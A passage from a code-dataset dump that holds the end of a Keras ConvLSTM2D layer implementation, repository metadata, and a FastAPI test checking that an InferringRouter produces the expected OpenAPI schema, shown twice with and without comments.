self.W_f, self.U_f, self.b_f,
self.W_o, self.U_o, self.b_o]
self.W = K.concatenate([self.W_i, self.W_f, self.W_c, self.W_o])
self.U = K.concatenate([self.U_i, self.U_f, self.U_c, self.U_o])
self.b = K.concatenate([self.b_i, self.b_f, self.b_c, self.b_o])
self.regularizers = []
if self.W_regularizer:
self.W_regularizer.set_param(self.W)
self.regularizers.append(self.W_regularizer)
if self.U_regularizer:
self.U_regularizer.set_param(self.U)
self.regularizers.append(self.U_regularizer)
if self.b_regularizer:
self.b_regularizer.set_param(self.b)
self.regularizers.append(self.b_regularizer)
if self.initial_weights is not None:
self.set_weights(self.initial_weights)
del self.initial_weights
self.built = True
def reset_states(self):
assert self.stateful, 'Layer must be stateful.'
input_shape = self.input_spec[0].shape
output_shape = self.get_output_shape_for(input_shape)
if not input_shape[0]:
raise ValueError('If a RNN is stateful, a complete ' +
'input_shape must be provided ' +
'(including batch size).')
if self.return_sequences:
out_row, out_col, out_filter = output_shape[2:]
else:
out_row, out_col, out_filter = output_shape[1:]
if hasattr(self, 'states'):
K.set_value(self.states[0],
np.zeros((input_shape[0],
out_row, out_col, out_filter)))
K.set_value(self.states[1],
np.zeros((input_shape[0],
out_row, out_col, out_filter)))
else:
self.states = [K.zeros((input_shape[0],
out_row, out_col, out_filter)),
K.zeros((input_shape[0],
out_row, out_col, out_filter))]
def conv_step(self, x, W, b=None, border_mode='valid'):
input_shape = self.input_spec[0].shape
conv_out = K.conv2d(x, W, strides=self.subsample,
border_mode=border_mode,
dim_ordering=self.dim_ordering,
image_shape=(input_shape[0],
input_shape[2],
input_shape[3],
input_shape[4]),
filter_shape=self.W_shape)
if b:
if self.dim_ordering == 'th':
conv_out = conv_out + K.reshape(b, (1, self.nb_filter, 1, 1))
elif self.dim_ordering == 'tf':
conv_out = conv_out + K.reshape(b, (1, 1, 1, self.nb_filter))
else:
raise ValueError('Invalid dim_ordering:', self.dim_ordering)
return conv_out
def conv_step_hidden(self, x, W, border_mode='valid'):
input_shape = self.input_spec[0].shape
output_shape = self.get_output_shape_for(input_shape)
if self.return_sequences:
out_row, out_col, out_filter = output_shape[2:]
else:
out_row, out_col, out_filter = output_shape[1:]
conv_out = K.conv2d(x, W, strides=(1, 1),
border_mode=border_mode,
dim_ordering=self.dim_ordering,
image_shape=(input_shape[0],
out_row, out_col,
out_filter),
filter_shape=self.W_shape1)
return conv_out
def step(self, x, states):
assert len(states) == 4
h_tm1 = states[0]
c_tm1 = states[1]
B_U = states[2]
B_W = states[3]
x_i = self.conv_step(x * B_W[0], self.W_i, self.b_i,
border_mode=self.border_mode)
x_f = self.conv_step(x * B_W[1], self.W_f, self.b_f,
border_mode=self.border_mode)
x_c = self.conv_step(x * B_W[2], self.W_c, self.b_c,
border_mode=self.border_mode)
x_o = self.conv_step(x * B_W[3], self.W_o, self.b_o,
border_mode=self.border_mode)
h_i = self.conv_step_hidden(h_tm1 * B_U[0], self.U_i,
border_mode='same')
h_f = self.conv_step_hidden(h_tm1 * B_U[1], self.U_f,
border_mode='same')
h_c = self.conv_step_hidden(h_tm1 * B_U[2], self.U_c,
border_mode='same')
h_o = self.conv_step_hidden(h_tm1 * B_U[3], self.U_o,
border_mode='same')
i = self.inner_activation(x_i + h_i)
f = self.inner_activation(x_f + h_f)
c = f * c_tm1 + i * self.activation(x_c + h_c)
o = self.inner_activation(x_o + h_o)
h = o * self.activation(c)
return h, [h, c]
def get_constants(self, x):
constants = []
if 0 < self.dropout_U < 1:
ones = K.zeros_like(x)
ones = K.sum(ones, axis=1)
ones = self.conv_step(ones, K.zeros(self.W_shape),
border_mode=self.border_mode)
ones = ones + 1
B_U = [K.in_train_phase(K.dropout(ones, self.dropout_U), ones)
for _ in range(4)]
constants.append(B_U)
else:
constants.append([K.cast_to_floatx(1.) for _ in range(4)])
if 0 < self.dropout_W < 1:
ones = K.zeros_like(x)
ones = K.sum(ones, axis=1)
ones = ones + 1
B_W = [K.in_train_phase(K.dropout(ones, self.dropout_W), ones)
for _ in range(4)]
constants.append(B_W)
else:
constants.append([K.cast_to_floatx(1.) for _ in range(4)])
return constants
def get_config(self):
config = {'nb_filter': self.nb_filter,
'nb_row': self.nb_row,
'nb_col': self.nb_col,
'init': self.init.__name__,
'inner_init': self.inner_init.__name__,
'forget_bias_init': self.forget_bias_init.__name__,
'activation': self.activation.__name__,
'dim_ordering': self.dim_ordering,
'border_mode': self.border_mode,
'inner_activation': self.inner_activation.__name__}
base_config = super(ConvLSTM2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
| true
| true
|
1c3ebae06ecaeff2cc3672f54ae2f7f6aacdadc3
| 1,642
|
py
|
Python
|
tests/test_fastapi_utils/test_features/test_inferring_router.py
|
dmontagu/fastapi-auth
|
d0e86774f66bd43e80376de19bdf034eb228dc07
|
[
"MIT"
] | 87
|
2019-12-18T05:43:25.000Z
|
2022-03-30T20:04:11.000Z
|
tests/test_fastapi_utils/test_features/test_inferring_router.py
|
dmontagu/fastapi-auth
|
d0e86774f66bd43e80376de19bdf034eb228dc07
|
[
"MIT"
] | 2
|
2020-08-07T05:17:18.000Z
|
2021-09-14T03:20:04.000Z
|
tests/test_fastapi_utils/test_features/test_inferring_router.py
|
dmontagu/fastapi-auth
|
d0e86774f66bd43e80376de19bdf034eb228dc07
|
[
"MIT"
] | 7
|
2020-03-08T17:14:33.000Z
|
2022-01-01T21:38:47.000Z
|
from fastapi import FastAPI
from fastapi_auth.fastapi_util.features.inferring_router import InferringRouter
openapi_spec = {
"info": {"title": "Fast API", "version": "0.1.0"},
"openapi": "3.0.2",
"paths": {
"/1": {
"get": {
"operationId": "endpoint_1_1_get",
"responses": {
"200": {
"content": {
"application/json": {"schema": {"title": "Response " "Endpoint 1 1 Get", "type": "string"}}
},
"description": "Successful " "Response",
}
},
"summary": "Endpoint 1",
}
},
"/2": {
"get": {
"operationId": "endpoint_2_2_get",
"responses": {
"200": {
"content": {
"application/json": {"schema": {"title": "Response " "Endpoint 2 2 Get", "type": "integer"}}
},
"description": "Successful " "Response",
}
},
"summary": "Endpoint 2",
}
},
},
}
def test_inferring_router() -> None:
inferring_router = InferringRouter()
@inferring_router.get("/1")
def endpoint_1() -> str: # pragma: no cover
return ""
@inferring_router.get("/2", response_model=int)
def endpoint_2() -> str: # pragma: no cover
return ""
app = FastAPI()
app.include_router(inferring_router)
assert app.openapi() == openapi_spec
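For comparison, the inference the test exercises is equivalent to spelling the response models out on a plain APIRouter; a sketch of that equivalence follows (endpoint names invented, behaviour matching the spec asserted above):
from fastapi import APIRouter
plain_router = APIRouter()
@plain_router.get("/1", response_model=str)   # what InferringRouter derives from "-> str"
def endpoint_1_explicit() -> str:
    return ""
@plain_router.get("/2", response_model=int)   # an explicit response_model wins over the annotation
def endpoint_2_explicit() -> str:
    return ""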
| 29.854545
| 120
| 0.433618
|
from fastapi import FastAPI
from fastapi_auth.fastapi_util.features.inferring_router import InferringRouter
openapi_spec = {
"info": {"title": "Fast API", "version": "0.1.0"},
"openapi": "3.0.2",
"paths": {
"/1": {
"get": {
"operationId": "endpoint_1_1_get",
"responses": {
"200": {
"content": {
"application/json": {"schema": {"title": "Response " "Endpoint 1 1 Get", "type": "string"}}
},
"description": "Successful " "Response",
}
},
"summary": "Endpoint 1",
}
},
"/2": {
"get": {
"operationId": "endpoint_2_2_get",
"responses": {
"200": {
"content": {
"application/json": {"schema": {"title": "Response " "Endpoint 2 2 Get", "type": "integer"}}
},
"description": "Successful " "Response",
}
},
"summary": "Endpoint 2",
}
},
},
}
def test_inferring_router() -> None:
inferring_router = InferringRouter()
@inferring_router.get("/1")
def endpoint_1() -> str:
return ""
@inferring_router.get("/2", response_model=int)
def endpoint_2() -> str:
return ""
app = FastAPI()
app.include_router(inferring_router)
assert app.openapi() == openapi_spec
| true
| true
|